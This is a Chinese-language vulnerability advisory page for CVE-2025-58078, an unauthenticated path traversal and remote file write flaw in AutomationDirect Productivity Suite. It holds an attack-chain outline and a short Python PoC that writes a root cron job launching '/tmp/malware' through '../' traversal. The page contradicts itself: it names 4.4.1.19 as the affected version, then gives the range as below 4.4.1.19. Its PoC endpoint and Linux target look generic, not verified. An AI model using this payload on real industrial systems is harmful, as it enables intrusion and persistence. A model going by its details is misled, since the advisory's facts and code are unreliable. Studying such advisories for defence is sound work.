IPBUF安全漏洞报告
English
CVE-2025-58078 CVSS 7.5 高危

CVE-2025-58078: Productivity Suite 路径遍历漏洞导致远程文件写入

披露日期: 2025-10-23

漏洞信息

漏洞编号
CVE-2025-58078
漏洞类型
路径遍历
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
AutomationDirect Productivity Suite 4.4.1.19

相关标签

路径遍历文件写入远程代码执行工业控制系统Productivity SuiteAutomationDirectCVE-2025-58078

漏洞概述

CVE-2025-58078是AutomationDirect Productivity Suite软件中的一个严重路径遍历漏洞。该漏洞存在于ProductivityService PLC模拟器组件中,CVSS评分7.5,属于高危漏洞。攻击者可以利用此漏洞通过构造特殊的相对路径字符串,未经身份验证即可远程访问PLC模拟器服务,在目标系统的任意位置写入包含任意数据的文件。由于该软件广泛应用于工业控制系统环境中,漏洞的成功利用可能导致系统文件被篡改、恶意代码植入或敏感信息泄露,对工业生产环境造成严重安全威胁。建议相关用户立即采取防护措施。

技术细节

该路径遍历漏洞源于ProductivitySuite的ProductivityService组件对用户输入的路径验证不充分。攻击者可利用'..'等相对路径标识符绕过安全限制,访问系统目录结构之外的敏感文件位置。通过精心构造的HTTP或其他网络请求,攻击者能够指定目标文件路径并注入任意内容,实现远程文件写入操作。此漏洞无需认证即可利用,大大增加了攻击面和风险等级。

攻击链分析

STEP 1
信息收集
识别运行ProductivitySuite 4.4.1.19的目标系统
STEP 2
漏洞探测
向ProductivityService端点发送包含路径遍历序列的请求
STEP 3
载荷注入
利用'../'绕过路径限制,指定任意写入位置
STEP 4
文件写入
成功在目标系统写入恶意文件或篡改现有文件

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target:8080' payload = { 'path': '../../etc/cron.d/malicious', 'data': '*/5 * * * * root /tmp/malware\n' } response = requests.post(f'{target}/ProductivityService/write', json=payload) print(response.status_code, response.text)

影响范围

AutomationDirect Productivity Suite < 4.4.1.19

防御指南

临时缓解措施
在官方补丁发布前,可通过防火墙规则限制对ProductivityService端口的访问,仅允许受信任的IP地址连接,并启用详细的访问日志以便及时发现异常行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表